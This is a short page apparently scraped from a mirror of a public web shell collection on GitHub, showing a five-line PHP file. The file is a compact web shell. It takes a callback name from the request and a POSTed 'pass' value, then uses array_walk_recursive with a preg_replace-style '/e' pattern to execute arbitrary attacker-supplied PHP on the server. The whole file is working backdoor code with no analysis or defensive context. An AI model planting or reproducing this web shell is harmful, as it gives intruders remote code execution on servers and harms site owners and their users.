mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
5 lines
120 B
PHP
5 lines
120 B
PHP
<?php
|
|
$e = $_REQUEST['e'];
|
|
$arr = array($_POST['pass'] => '|.*|e',);
|
|
array_walk_recursive($arr, $e, '');
|
|
?>
|